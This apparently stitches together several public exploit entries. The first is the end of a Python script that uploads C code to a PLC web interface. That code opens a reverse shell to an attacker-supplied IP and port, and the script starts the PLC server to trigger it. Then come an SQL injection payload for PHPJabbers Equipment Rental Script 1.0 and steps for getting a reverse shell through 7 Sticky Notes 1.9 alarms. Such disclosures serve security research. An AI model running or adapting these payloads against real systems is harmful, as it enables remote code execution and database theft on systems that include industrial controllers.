1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"aow_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------169043028319378579443281515639--\r\n"
# \"ladder.h\"\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nint ignored_bool_inputs[] = {-1};\r\nint ignored_bool_outputs[] = {-1};\r\nint ignored_int_inputs[] = {-1};\r\nint ignored_int_outputs[] = {-1};\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nvoid initCustomLayer()\r\n{\r\n \r\n \r\n \r\n}\r\n\r\n\r\nvoid updateCustomIn()\r\n{\r\n\r\n}\r\n\r\n\r\nvoid updateCustomOut()\r\n{\r\n int port = "+rev_port+";\r\n struct sockaddr_in revsockaddr;\r\n\r\n int sockt = socket(AF_INET, SOCK_STREAM, 0);\r\n revsockaddr.sin_family = AF_INET; \r\n revsockaddr.sin_port = htons(port);\r\n revsockaddr.sin_addr.s_addr = inet_addr(\""+rev_ip+"\");\r\n\r\n connect(sockt, (struct sockaddr *) &revsockaddr, \r\n sizeof(revsockaddr));\r\n dup2(sockt, 0);\r\n dup2(sockt, 1);\r\n dup2(sockt, 2);\r\n\r\n char * const argv[] = {\"/bin/sh\", NULL};\r\n execve(\"/bin/sh\", argv, NULL);\r\n\r\n return 0; \r\n \r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------289530314119386812901408558722--\r\n"
inject = x.post(inject_url, headers=inject_headers, cookies=inject_cookies, data=inject_data)
time.sleep(3)
# comp = x.get(compile_program)
# time.sleep(6)
# x.get(inject_dash)
# time.sleep(3)
# print('[+] Spawning Reverse Shell...')
start = x.get(run_plc_server)
time.sleep(1)
if start.status_code == 200:
print('[+] Reverse connection receveid!')
sys.exit(0)
else:
print('[+] Failed to receive connection :(')
sys.exit(0)
auth()
injection()
connection()
## Title: Equipment Rental Script-1.0 - SQLi
## Author: nu11secur1ty
## Date: 09/12/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The package_id parameter appears to be vulnerable to SQL injection
attacks. The payload ' was submitted in the package_id parameter, and
a database error message was returned. You should review the contents
of the error message, and the application's handling of other input,
to confirm whether a vulnerability is present. The attacker can steal
all information from the database!
[+]Payload:
mysql
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: package_id=(-4488))) OR 1 GROUP BY
CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0
END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING
MIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00
## Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
home page: https://www.nu11secur1ty.com/
# Exploit Title: 7 Sticky Notes v1.9 - OS Command Injection
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 12.09.2023
# Vendor Homepage: http://www.7stickynotes.com
# Software Link:
http://www.7stickynotes.com/download/Setup7StickyNotesv19.exe
# Tested Version: 1.9 (latest)
# Tested on: Windows 2019 Server 64bit
# # # Steps to Reproduce # # #
# Open the program.
# Click on "New Note".
# Navigate to the "Alarms" tab.
# Click on either of the two buttons.
# From the "For" field, select "1" and "seconds" (to obtain the shell
within 1 second).
# From the "Action" dropdown, select "command".
# In the activated box, enter the reverse shell command and click the "Set"
button to set the alarm.
# Finally, click on the checkmark to save the alarm.
# Reverse shell obtained!